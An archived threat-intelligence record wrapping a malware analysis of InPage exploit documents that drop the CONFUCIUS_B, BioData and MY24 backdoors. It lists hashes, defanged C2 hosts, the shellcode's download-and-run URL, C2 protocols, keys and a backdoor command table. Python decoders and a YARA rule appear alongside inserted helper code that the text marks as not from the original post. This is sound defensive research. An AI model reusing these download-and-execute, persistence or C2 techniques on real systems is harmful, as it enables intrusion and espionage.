{
	"id": "49537509-5ac1-47c1-a004-7ffcd99c338d",
	"created_at": "2026-04-06T00:18:11.279099Z",
	"updated_at": "2026-04-10T03:33:38.165759Z",
	"deleted_at": null,
	"sha1_hash": "6918d5cba6ccf1aef4eb5fecb7b514215f19e6ee",
	"title": "Recent InPage Exploits Lead to Multiple Malware Families",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2531276,
	"plain_text": "Recent InPage Exploits Lead to Multiple Malware Families\r\nBy Jacob Soo, Josh Grunzweig\r\nPublished: 2017-11-02 · Archived: 2026-04-05 13:23:06 UTC\r\nIn recent weeks, Unit 42 has discovered three documents crafted to exploit the InPage program. InPage is a word\r\nprocessor that supports languages such as Urdu, Persian, Pashto, and Arabic. The three InPage exploit\r\nfiles are linked through their use of very similar shellcode, which suggests that either the same actor is behind\r\nthese attacks, or the attackers have access to a shared builder. The documents were found to drop the following\r\nmalware families:\r\nThe previously discussed CONFUCIUS_B malware family\r\nA backdoor previously not discussed in the public domain, commonly detected by some antivirus solutions\r\nas “BioData”\r\nA previously unknown backdoor that we have named MY24\r\nThe use of InPage as an attack vector is not commonly seen, with the only previously noted attacks being\r\ndocumented by Kaspersky in late 2016.\r\nThe decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily\r\nmotivated. They contained subjects such as intelligence reports and political situations related to India, the\r\nKashmir region, or terrorism being used as lure documents.\r\nIn the blog below, we analyze and present our findings on three of these malicious InPage documents:\r\nCyber Advisory No 91.inp\r\nIntelligence Report-561 (1).inp\r\nTehreek-E-Kashmir Mujahaid List.inp\r\nWe also include analysis of the new backdoor we discovered: MY24.\r\n \r\nCyber Advisory No 91.inp\r\nWe discovered the first InPage exploit to have the following attributes:\r\nSHA256 1d1e7a6175e6c514aaeca8a43dabefa017ddc5b166ccb636789b6a767181a022\r\nOriginal Filename Cyber Advisory No 91.inp\r\nThe exploit for this document is the same one described by Kaspersky late last year. This exploit was\r\nunsuccessful against the latest version of InPage (Version 3.60), and as such the underlying vulnerability has likely\r\nbeen patched.\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/\r\nPage 1 of 15\n\nOverall, the entire execution flow of this malware from start to finish can be summarized as follows:\r\nFigure 1 InPage exploit document execution flow\r\n \r\nWhen the malicious .INP file is opened using a vulnerable version of InPage, it will execute the shellcode that is\r\nembedded within it.\r\nThis particular shellcode, along with the shellcode found within another InPage exploit document that will be\r\ndiscussed later on, begins with a marker of ‘LuNdLuNd’, followed by a series of NOPs. It then locates the\r\noffset of an embedded executable file, which will eventually be run on the victim machine.\r\nThis particular shellcode uses a unique hashing mechanism for identifying and loading Microsoft Windows\r\nlibraries and functions. It uses this method to load a series of functions, as seen below:\r\nFigure 2 Shellcode loading functions using custom hashing algorithm\r\n \r\nThe hashing algorithm in question can be represented in Python as follows:\r\ndef hashAlgo(string):\r\n  # OR each byte with 0x60 (this folds case), add it to the running hash, then shift left by one.\r\n  # The shellcode keeps the running hash in a 32-bit register (add ebx,edx / shl ebx,1 in the\r\n  # YARA rule below), so the value is masked to 32 bits here to match it for long names.\r\n  hsh = 0\r\n  for c in string:\r\n    v1 = ord(c) | 0x60\r\n    hsh = (2 * (hsh + v1)) \u0026 0xFFFFFFFF\r\n  return hsh\r\nlibrary = \"ntdll.dll\"\r\nfunction = \"memcpy\"\r\nprint(\"[+] '{}' Library: 0x{:x}\".format(library, hashAlgo(library)))\r\nprint(\"[+] '{}' Function: 0x{:x}\".format(function, hashAlgo(function)))\r\nOutput:\r\n[+] 'ntdll.dll' Library: 0x1b708\r\n[+] 'memcpy' Function: 0x347a\r\nThis particular hashing algorithm does not appear to be widely used; however, in our searches using the YARA\r\nrule provided at the end of this blog, we were able to identify roughly 70 PE32 samples that have recently\r\nemployed this same hashing technique.\r\nThe shellcode then proceeds to attempt to create a mutex with a value of “QPONMLKJIH” to ensure only one\r\ninstance of the shellcode is running at a given time. Finally, the shellcode will copy the embedded payload into\r\nnewly allocated memory before executing it.\r\nThis newly dropped payload is a DLL with the following attributes:\r\nSHA256 7bbf14ced3ca490179d3727b7287eb581c3a730131331be042d0f0510bc804f9\r\nCompile Timestamp 2015-05-08 12:51:54 UTC\r\nPDB String c:\\users\\mz\\documents\\visual studio 2013\\Projects\\Shellcode\\Release\\Shellcode.pdb\r\n \r\nThis particular DLL acts as a dropper, and has two embedded resource files: an executable payload that will be\r\nused to ultimately drop the final payload, as well as a decoy InPage file. It begins by spawning a new thread that\r\nloads the two files from embedded resources with names of ‘BIN’ and ‘BIN2’ respectively. 
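As an added example (not code from the Unit 42 post), the following script turns the hashing routine shown above into a resolver: given the hash values recovered from a shellcode sample, it brute-forces them against a list of export names. The candidate export list here is constructed for illustration; in practice it would be populated from the export tables of ntdll.dll and kernel32.dll (for example via the pefile module). Two properties of the routine matter for anyone doing this: the shellcode accumulates the hash in a 32-bit register, so names of roughly 24 characters or more wrap and must be masked, and the ‘| 0x60’ step folds case and also maps ‘.’ onto ‘n’, so ‘NTDLL.DLL’, ‘ntdll.dll’ and ‘ntdllndll’ all hash identically.

```python
# Added example (not from the Unit 42 post): resolve API hashes produced by the
# InPage shellcode's hashing routine against candidate export names.

def inpage_hash(name):
    # Same routine as the shellcode: OR each byte with 0x60, add it to the running
    # hash, shift left by one. The shellcode accumulates in a 32-bit register
    # (add ebx,edx / shl ebx,1 in the YARA rule), so the result wraps at 2**32.
    h = 0
    for b in name.encode('latin-1'):
        h = (2 * (h + (b | 0x60))) & 0xFFFFFFFF
    return h

def build_hash_table(export_names):
    # Map hash -> list of names. Because '| 0x60' folds case and also maps some
    # punctuation onto letters ('.' -> 'n'), distinct names can collide; keep all.
    table = {}
    for name in export_names:
        table.setdefault(inpage_hash(name), []).append(name)
    return table

def resolve(hashes, export_names):
    # Return {hash: [candidate names]} for every hash pulled out of the shellcode.
    table = build_hash_table(export_names)
    return {h: table.get(h, []) for h in hashes}

# Constructed candidate list. For real work, dump the export tables of ntdll.dll,
# kernel32.dll etc. (for example with the pefile module) and feed those names in.
CANDIDATE_EXPORTS = [
    'memcpy', 'memset', 'strlen', 'NtAllocateVirtualMemory',
    'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc', 'CreateMutexA',
    'WinExec', 'CreateThread', 'ExitProcess', 'SetUnhandledExceptionFilter',
]

if __name__ == '__main__':
    # The two hashes the post walks through, plus one that has no candidate
    # (every hash from this routine is even, so an odd value can never resolve).
    wanted = [inpage_hash('ntdll.dll'), inpage_hash('memcpy'), 0xdeadbeef]
    names = CANDIDATE_EXPORTS + ['ntdll.dll', 'kernel32.dll']
    for h, candidates in resolve(wanted, names).items():
        print('0x{:08x} -> {}'.format(h, candidates or '<unresolved>'))
```

Because the hash is only 32 bits wide and the case folding discards information, treat a single candidate as a strong hint rather than proof; confirm against the actual export table of the DLL version the sample targets.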
The executable is\r\ndropped to the following path before it is executed:\r\n%TEMP%\\winopen.exe\r\nThe InPage decoy document is dropped to the following path before it is opened:\r\n%TEMP%\\SAMPLE.INP\r\nThe decoy document in question looks like the following. A rough translation to English has been provided in\r\nred:\r\nFigure 3 Decoy InPage file with rough translation\r\n \r\nBased on the rough translation of this document, it appears to deal with current issues within the Kashmir region.\r\nThis is not consistent with the original filename, and it is unclear why this is the case. Perhaps the\r\nattacker forgot to change the lure from a previous exploit, or simply didn’t find it necessary. This lure, while\r\ninconsistent with the original filename, is in line with the other InPage exploit file that also looked to be of the\r\nsame subject matter.\r\nThe executable file in the ‘%TEMP%\\winopen.exe’ path has the following attributes:\r\nSHA256 692815d06b720669585a71bc8151b89ca6748f882b35e365e08cfaf6eda77049\r\nCompile Timestamp 2017-07-31 06:03:42 UTC\r\n \r\nThis particular executable is made to resemble the legitimate application PuTTY. Unlike other files we witnessed up\r\nto this point, this sample has rudimentary anti-debugging and anti-analysis techniques in place prior to the main\r\nexecution flow.\r\nIt proceeds to decrypt an embedded resource object using the RC4 algorithm. The following key is used for\r\ndecryption:\r\nVACqItywGR1v3qGxVZQPYXxMZV0o2fzp\r\nAfter this data is decrypted, the following registry key is written to ensure persistence. Again, we see the malware\r\nmimic the appearance of the legitimate PuTTY application:\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Putty - %TEMP%\\winopen.exe\r\nFinally, the malware will spawn a new suspended instance of itself, into which the decrypted data is written and\r\nsubsequently executed.\r\nThis next stage of malware has the following properties:\r\nSHA256 bb5540fe0bbc0cda08865aad891a585cd465b224bfe84762216cd04178087516\r\nCompile Timestamp 2017-05-17 05:47:05 UTC\r\n \r\nThis malware operates almost identically to the previously witnessed sample. However, this time the embedded\r\nresource object is decrypted using the following RC4 key:\r\nkRPAnN2DN6vfrxsJ55Lntnh7Mma8E68s\r\nThe next, and last, stage of this malware execution has the following attributes:\r\nSHA256 d1a14bc3160f5ed6232ceaf40de1959d7dba3eae614efd2882b04d538cda825b\r\nCompile Timestamp 2016-10-31 02:41:09 UTC\r\n \r\nThis final payload is an instance of the CONFUCIUS_B malware family, which we have previously discussed.\r\nThis particular sample attempts to connect to the following host for C2 operations:\r\n151.80.14[.]194\r\nIntelligence Report-561 (1).inp\r\nWe identified this malicious InPage document as having the following attributes:\r\nSHA256 35c5f6030513f11fd1dcf9bd232de457ba7f3af3aedc0e2e976895b296a09df6\r\nOriginal Filename Intelligence Report-561 (1).inp\r\n \r\nThis particular exploit file uses the exact same shellcode witnessed previously, where an embedded DLL is loaded\r\ninto memory. Again, this executable drops and executes two files: a Microsoft Windows executable payload and\r\nan InPage decoy document.\r\nThe embedded payload within the shellcode has the following attributes:\r\nSHA256 83e3b2938ee6a3e354c93c6ec756da96b03cc69118b5748b07aee4d900da1844\r\nCompile Timestamp 2015-05-08 12:51:54 UTC\r\nPDB String c:\\users\\mz\\documents\\visual studio 2013\\Projects\\Shellcode\\Release\\Shellcode.pdb\r\n \r\nAgain, we see the executable payload and decoy document dropped to the following respective locations:\r\n%TEMP%\\winopen.exe\r\n%TEMP%\\SAMPLE.inp\r\nThe dropped executable is a previously undocumented backdoor written in Delphi that has been named BioData\r\nby multiple antivirus organizations.\r\nThis InPage exploit document follows a much simpler execution flow, as seen in the following diagram.\r\nFigure 4 InPage exploit execution flow\r\n \r\nThe decoy InPage file dropped by this malware looks like the following. The language used within it appears to be\r\na mix of Arabic and Urdu. A rough translation has been provided in red in the image below.\r\nFigure 5 Decoy InPage document dropped by malware\r\n \r\nThe BioData payload has the following attributes:\r\nSHA256 5716509e4cdbf8ffa5fbce02b8881320cb852d98e590215455986a5604a453f7\r\nCompile Timestamp 1992-06-19 22:22:17 UTC\r\n \r\nNote that the timestamp above is the result of this sample being compiled in Delphi, which uses the same\r\nhardcoded compilation timestamp for all samples that it generates.\r\nThroughout the execution of this sample, numerous strings are decoded using a customized 94-character\r\nsubstitution table. BioData will go through each character of the obfuscated string, and will replace each character\r\nbased on the following table:\r\nFigure 6 Substitution table used by BioData\r\n \r\nThe malware proceeds to create a ‘Document’ folder within the %USERPROFILE% directory. This\r\nfolder will contain all of the malware’s files throughout its execution. In order to maintain persistence, the\r\nmalware will generate the following file in the startup folder, which points to the current path of the BioData\r\nexecutable:\r\nAdobe creative suit.lnk\r\nBioData proceeds to generate a randomized 30-character string of uppercase and lowercase letters. This string is\r\nwritten to the following file:\r\n%USERPROFILE%\\Document\\users.txt\r\nThis 30-character string is used by the malware to act as a unique identifier for the victim, and will be used for all\r\nnetwork communication with a remote server.\r\nThe username and computer name are identified, and are written to a string of the following format:\r\nUser name and System Name :- [Username]_[Computer Name]\r\nThis data is obfuscated and written to the following file:\r\n%USERPROFILE%\\Document\\SyLog.log\r\nIn order to obfuscate this data, the malware uses a unique algorithm. Represented in Python, the following script\r\nwill decode this file:\r\nimport sys\r\n\r\ndef bit_not(n, numbits=8):\r\n  # Bitwise NOT restricted to numbits bits (8 here), i.e. 0xFF - n for a byte.\r\n  return (1 \u003c\u003c numbits) - 1 - n\r\n\r\ndef decode(data):\r\n  # data is the raw content of SyLog.log as bytes. Each byte is XORed with\r\n  # NOT((0x6121 \u003e\u003e c) \u0026 0xFF), where c is the position within a 32-byte block.\r\n  c = 0\r\n  output = \"\"\r\n  for d in data:\r\n    o = bit_not((0x6121 \u003e\u003e c) \u0026 0xFF)\r\n    output += chr(d ^ o)\r\n    c += 1\r\n    if c == 32:\r\n      c = 0\r\n  return output\r\n\r\nif __name__ == '__main__':\r\n  with open(sys.argv[1], 'rb') as fh:\r\n    print(decode(fh.read()))\r\nBioData sends both GET and POST requests to the following URL:\r\nhttp://errorfeedback[.]com/MarkQuality455/developerbuild.php\r\nPOST requests are made with a hardcoded User-Agent, shown below in Figure 7. Additionally, a ‘b’ GET\r\nparameter is included that contains the victim’s previously generated unique identifier. The contents of the POST\r\nrequests are the obfuscated SyLog.log file. The remote C2 server has been observed responding to these requests\r\nwith ‘Success’. These requests simply act as a beacon, including the basic victim information that was previously\r\nobtained.\r\nFigure 7 HTTP POST request by BioData\r\n \r\nGET requests are made in a slightly different fashion. These requests contain an empty User-Agent, and are also\r\nfound to be missing a number of HTTP headers that are commonly seen.\r\nFigure 8 HTTP GET request by BioData\r\n \r\nUnlike the POST requests, the malware both looks for and makes use of the response given, if any, by the C2\r\nserver. The malware parses any response given by first hex-decoding it. It then base64-decodes the resulting\r\nstring. 
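The SyLog.log decoder above can be generalised, as an added example that is not part of the original post, into a symmetric codec: the obfuscation is XOR with a fixed 32-byte keystream derived from 0x6121, so one function both encodes and decodes, which makes it easy to build test files or to match SyLog.log uploads inside captured POST bodies. Two details fall straight out of the algorithm: the keystream byte for position 0 is 0xDE, and for positions 15 to 31 of every block the shifted constant is zero, so those bytes are simply the plaintext inverted. The block also implements the hex-then-base64 layer the C2 uses for its responses (and, in reverse, for the ‘f’ parameter of the completion beacon described below), restoring base64 padding before decoding because the observed ‘f’ value lacks its ‘=’ padding. The username and computer name are constructed sample data.

```python
# Added example (not from the Unit 42 post): BioData's SyLog.log obfuscation as
# a symmetric codec, plus the hex/base64 layer used on the C2 channel.
import base64

def sylog_keystream():
    # Byte c of each 32-byte block is NOT((0x6121 >> c) & 0xFF). For c >= 15 the
    # shifted constant is 0, so bytes 15..31 of every block are simply inverted.
    return bytes((~((0x6121 >> c) & 0xFF)) & 0xFF for c in range(32))

def sylog_codec(data):
    # XOR with the repeating 32-byte keystream; encoding and decoding are identical.
    ks = sylog_keystream()
    return bytes(b ^ ks[i % 32] for i, b in enumerate(data))

def sylog_record(username, computername):
    # The plaintext BioData writes before obfuscating it.
    return 'User name and System Name :- {}_{}'.format(username, computername).encode('latin-1')

def decode_c2_response(hexstr):
    # C2 replies are hex(base64(name)). The observed 'f' value on the page lacks
    # the '=' padding, so restore padding before base64-decoding.
    b64 = bytes.fromhex(hexstr.strip())
    b64 += b'=' * (-len(b64) % 4)
    return base64.b64decode(b64).decode('latin-1')

def encode_f_param(name, keep_padding=False):
    # Inverse of the above, as used for the 'f' beacon parameter. By default the
    # '=' padding is stripped, which reproduces the value seen in the post.
    b64 = base64.b64encode(name.encode('latin-1'))
    if not keep_padding:
        b64 = b64.rstrip(b'=')
    return b64.hex()

if __name__ == '__main__':
    # Constructed sample victim data.
    blob = sylog_codec(sylog_record('alice', 'DESKTOP-01'))
    print(blob.hex())
    print(sylog_codec(blob).decode('latin-1'))
    print(decode_c2_response('62574673643246795a53356c654755'))
    print(encode_f_param('malware.exe'))
```

For detection, the inverted tail of each block is the useful property: in a captured POST body, bytes 15 to 31 of the first block XORed with 0xFF should read as plain text from the ‘User name and System Name’ record.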
The final string is used to form a subsequent GET request.\r\nIf, for instance, the C2 server responded with a string that decodes to ‘malware.exe’, the subsequent GET request would\r\nlook like the following:\r\nhttp://errorfeedback[.]com/MarkQuality455/bzGwXILtkMRZaJxzciXAeCYviduBuy/malware.exe\r\nThe request above uses the same victim identifier that has been observed in the previous examples provided.\r\nThe response to this hypothetical ‘malware.exe’ request contains the raw contents of the payload that BioData will drop to disk\r\nand execute. The contents are placed in the following file path for this hypothetical:\r\n%USERPROFILE%\\Document\\malware.exe\r\nFinally, after this dropped payload is successfully executed, the malware will send a GET request such as the\r\nfollowing:\r\nhttp://errorfeedback[.]com/MarkQuality455/developerbuild.php?\r\nf=62574673643246795a53356c654755\u0026b=bzGwXILtkMRZaJxzciXAeCYviduBuy\r\nIn the above example, the ‘b’ parameter is the victim identifier, and the ‘f’ parameter is the string ‘malware.exe’\r\nafter it has been base64-encoded and then hex-encoded (the observed value omits the single ‘=’ padding character\r\nof the base64 string, so a decoder should restore padding before base64-decoding). This request alerts the attacker that\r\nthe hypothetical payload ‘malware.exe’ has been run.\r\nTehreek-E-Kashmir Mujahaid List.inp\r\nWe identified this malicious InPage document as having the following attributes:\r\nSHA256 3e410397955d5a127182d69e019dbc8bbffeee864cd9c96e577c9c13f05a232f\r\nOriginal Filename Tehreek-E-Kashmir Mujahaid List.inp\r\nUnfortunately, no decoy document was included with this exploit file. However, the filename provides clues as to\r\nthe context that may have been present when this file was delivered to the intended recipient. The phrase\r\n‘Tehreek-E-Kashmir’ is most likely related to the conflict in the Kashmir region of India. Additionally, the term\r\n‘Mujahaid’ may be a misspelling of the word ‘Mujahid’, a term used to describe an individual engaged in Jihad.\r\nThis particular InPage shellcode looks to be near identical to the two others previously discussed; however, it\r\nappears as though the attackers simply partially overwrote the original shellcode that was present to substitute\r\ntheir own. This results in the shellcode acting as a downloader, instead of loading an embedded payload. We can\r\nsee the modifications visually in the following image:\r\nFigure 9 Differences between InPage exploit documents\r\n \r\nIn the image above, the ‘Cyber Advisory No 91.inp’ exploit file is much larger, as it includes the embedded\r\npayload. The ‘Tehreek-E-Kashmir Mujahaid List.inp’ exploit file has had this removed. However,\r\nartifacts from the original shellcode are still present, including the function that loads Microsoft Windows API\r\ncalls using the unique hashing algorithm.\r\nThe shellcode begins by iterating through the Process Environment Block (PEB), searching for a loaded module\r\nwhose name has a ‘3’ in the 7th position. In other words, the shellcode uses a simple trick to search for kernel32.dll. It\r\nproceeds to iterate through kernel32’s exports, looking for the GetProcAddress function. In order to find this\r\nfunction it will compare the first four letters against ‘GetP’, and the third set of four letters against ‘ddre’.\r\nThe shellcode then gets the address of the WinExec function, which in turn is used to execute the following\r\ncommand:\r\ncmd /c mkdir C:\\Wins\r\nIt then performs the following:\r\n1. Gets the address of the LoadLibraryA function\r\n2. Loads the urlmon.dll library\r\n3. Gets the address of the URLDownloadToFileA function\r\nThe shellcode then proceeds to make a request to the following URL and download the response to ‘C:\\Wins\\cnh’.\r\nhttp://zmwardrobe[.]com/wp-sign\r\nFinally, the shellcode will execute this downloaded file via a call to WinExec.\r\nThe response from this webserver returned a payload, which we have named MY24, with the following attributes:\r\nSHA256 71b7de2e3a60803df1c3fdc46af4fd8cfb7c803a53c9a85f7311348f6ff88cbe\r\nCompile Timestamp 2017-05-18 05:26:54 UTC\r\n \r\nIt should also be noted that a malicious Microsoft Word document with the following properties was observed\r\ndownloading and executing the same payload.\r\nSHA256 3f1d3d02e7707b2bc686b5add875e1258c65a0facd5cf8910ba0f321e230e17c\r\nOriginal Filename Las Vegas ISIS Claim Proof.doc\r\nFirst Seen 2017-10-05 05:53:27\r\n \r\nMY24 Analysis\r\nThis backdoor begins by decoding a series of embedded strings by adding 33 to each character. The following\r\nexample within the Python interpreter demonstrates this:\r\nFigure 10 Example string decoding within Python interpreter\r\nThe malware proceeds to execute a function that is responsible for generating the following path:\r\n%APPDATA%\\Startup\\wintasks.exe\r\nHowever, this path is never used, leading us to believe that the malware author had the intention of copying the\r\npayload to this destination and likely setting persistence, but seemingly forgot to.\r\nMY24 proceeds to spawn two timers whose functions are responsible for resolving the C2 domain of\r\nuserveblog.ddns[.]net, as well as connecting to this domain.\r\nTwo new threads are then created: one for handling any data that is received from the connection to the C2 and\r\none that is responsible for sending out data.\r\nFinally, a function is called that is responsible for collecting information about the victim machine. The following\r\ninformation is collected:\r\nVersion of Microsoft Windows\r\nUsername\r\nComputer name\r\nThe MY24 instance expects to receive a command initially from the remote server of userveblog.ddns[.]net on\r\nport 9832. All communication is performed using raw sockets via a custom communication protocol. The packets\r\nreceived by the malware have the following format:\r\nFigure 11 Received packet format for MY24 malware\r\n \r\nAll data received and sent by MY24 is encrypted using a 13-byte XOR key of \"t6%9k$2Ri9ctv\". The data portion\r\nof the received command will include one of the following commands:\r\nReceived Command Description\r\n2000 Return victim information\r\n2001 Get drive information\r\n2002 List files\r\n2004 Unknown\r\n2005 Create file handle to append data\r\n2006 Write appended data to previously created file handle\r\n2007 Create file handle for reading data\r\n2009 Read data from previously created file handle\r\n2012 Spawn a shell of cmd.exe\r\n2013 Interact with previously spawned shell\r\n2015 Unknown\r\n2016 Kill previously spawned shell\r\n2019 List current process network communication on the victim machine\r\n2021 Unknown\r\n2022 Kill process\r\n2023 Enumerate processes\r\n2025 Unknown\r\n \r\nResponses sometimes vary in size, but are primarily sent with a size of 9084 bytes. The author of this tool did not\r\nallocate a properly sized buffer when sending out the data, resulting in part of the stack being included in the response\r\nby the MY24 malware. Examples of commands being sent and received may be seen below. 
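As an added example (neither the custom server used for the analysis nor any MY24 code), the following block implements MY24’s transport-layer encryption, a repeating 13-byte XOR with the key quoted above, and shows why the oversized 9084-byte responses are a gift to an analyst: any run of identical bytes in the over-read region encrypts to a repeating 13-byte pattern, and a run of zero bytes encrypts to the raw key. The response layout used here (a command code followed by pipe-separated fields and zero fill) is constructed for illustration; the real field layout is in Figure 11 and the real over-read contains stack contents, which are not guaranteed to be zeros. The key is assumed to restart at byte 0 of each frame.

```python
# Added example (not from the Unit 42 post): MY24's transport layer is a
# repeating-key XOR; this shows the codec and how the fixed 9084-byte responses
# leak the key when the over-read buffer contains runs of identical bytes.
from collections import Counter

MY24_KEY = b't6%9k$2Ri9ctv'   # 13-byte key from the post
MY24_RESPONSE_SIZE = 9084      # typical response size from the post

def xor_repeating(data, key=MY24_KEY):
    # Encrypt and decrypt are the same operation. Assumption: the key index
    # restarts at byte 0 of every frame.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_key(ciphertext, keylen=13):
    # Split the frame into key-aligned windows and take the most common one. Any
    # stretch of zero bytes in the plaintext encrypts to the raw key, so if the
    # over-read region is mostly zeros (a constructed assumption here) that window
    # dominates. Returns (key, number_of_windows_supporting_it).
    windows = Counter(ciphertext[i:i + keylen]
                      for i in range(0, len(ciphertext) - keylen + 1, keylen))
    if not windows:
        raise ValueError('frame shorter than key length')
    key, count = windows.most_common(1)[0]
    return key, count

def build_response(payload, size=MY24_RESPONSE_SIZE, fill=0):
    # Constructed stand-in for an MY24 response: the real payload followed by
    # whatever the oversized send picks up, modelled here as 'fill' bytes.
    if len(payload) > size:
        raise ValueError('payload larger than response size')
    return payload + bytes([fill]) * (size - len(payload))

if __name__ == '__main__':
    # Constructed plaintext: a victim-information reply to command 2000. The real
    # field layout is in Figure 11 of the post; this one is made up for the demo.
    plain = build_response(b'2000|Windows 7|alice|DESKTOP-01')
    frame = xor_repeating(plain)
    key, support = recover_key(frame)
    print('recovered key: {!r} (from {} windows)'.format(key, support))
    print(xor_repeating(frame, key)[:40])
```

If the over-read region is filled with some other constant byte rather than zeros, the dominant window is the key XORed with that byte; one known plaintext byte anywhere in the frame is then enough to fix it, which is why a repeating XOR key offers no confidentiality once traffic volume is non-trivial.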
A custom server was\r\nwritten to interact with the MY24 malware, as seen in the following image.\r\n \r\nFigure 12 Interacting with MY24 backdoor\r\nConclusion\r\nWhile documents designed to exploit the InPage software are rare, they are not new. In recent weeks, however,\r\nUnit 42 has observed numerous InPage exploits leveraging similar shellcode, suggesting continued use of the\r\nexploit previously discussed by Kaspersky.\r\nThe decoy documents dropped suggest that the targets are likely to be politically or militarily motivated, with\r\nsubjects such as intelligence reports and political situations being used as lure documents. The variety of malware\r\npayloads dropped suggests the attackers behind these attacks have reasonable development resources behind them,\r\nand Unit 42 continues to observe new versions of these malware families being created.\r\nPalo Alto Networks customers are protected against these threats in a number of ways:\r\nAll domains observed in these malware families have been flagged as malicious.\r\nAll payloads are appropriately categorized as malicious within the WildFire platform and blocked by Traps.\r\nThe payloads witnessed have been tagged in AutoFocus as Confucius_B, MY24, and BioData for\r\ncontinued tracking and observation.\r\nAppendix\r\nYARA Rules\r\nrule InPageShellcodeHashing\r\n{\r\nstrings:\r\n$hashingFunction = {55 8B EC 51 53 52 33 C9 33 DB 33 D2 8B 45 08 8A 10 80 CA 60 03 DA D1 E3 03 45 10 8A 08 84 C9 E0 EE 33 C0 8B 4D 0C 3B D9 74 01 40 5A 5B 59 8B E5 5D C2 0C 00}\r\ncondition:\r\n$hashingFunction\r\n}\r\nSource: https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/"
	],
	"report_names": [
		"unit42-recent-inpage-exploits-lead-multiple-malware-families"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4",
			"created_at": "2025-08-07T02:03:25.123407Z",
			"updated_at": "2026-04-10T02:00:03.668131Z",
			"deleted_at": null,
			"main_name": "ZINC EMERSON",
			"aliases": [
				"Confucius ",
				"Dropping Elephant ",
				"EHDevel ",
				"Manul ",
				"Monsoon ",
				"Operation Hangover ",
				"Patchwork ",
				"TG-4410 ",
				"Viceroy Tiger "
			],
			"source_name": "Secureworks:ZINC EMERSON",
			"tools": [
				"Enlighten Infostealer",
				"Hanove",
				"Mac OS X KitM Spyware",
				"Proyecto2",
				"YTY Backdoor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7a8dbc5e-51a8-437a-8540-7dcb1cc110b8",
			"created_at": "2022-10-25T16:07:23.482856Z",
			"updated_at": "2026-04-10T02:00:04.627414Z",
			"deleted_at": null,
			"main_name": "Confucius",
			"aliases": [
				"G0142"
			],
			"source_name": "ETDA:Confucius",
			"tools": [
				"ApacheStealer",
				"ByeByeShell",
				"ChatSpy",
				"Confucius",
				"MY24",
				"Sneepy",
				"remote-access-c3",
				"sctrls",
				"sip_telephone",
				"swissknife2"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "caf95a6f-2705-4293-9ee1-6b7ed9d9eb4c",
			"created_at": "2022-10-25T15:50:23.472432Z",
			"updated_at": "2026-04-10T02:00:05.352882Z",
			"deleted_at": null,
			"main_name": "Confucius",
			"aliases": [
				"Confucius",
				"Confucius APT"
			],
			"source_name": "MITRE:Confucius",
			"tools": [
				"WarzoneRAT"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434691,
	"ts_updated_at": 1775792018,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6918d5cba6ccf1aef4eb5fecb7b514215f19e6ee.pdf",
		"text": "https://archive.orkl.eu/6918d5cba6ccf1aef4eb5fecb7b514215f19e6ee.txt",
		"img": "https://archive.orkl.eu/6918d5cba6ccf1aef4eb5fecb7b514215f19e6ee.jpg"
	}
}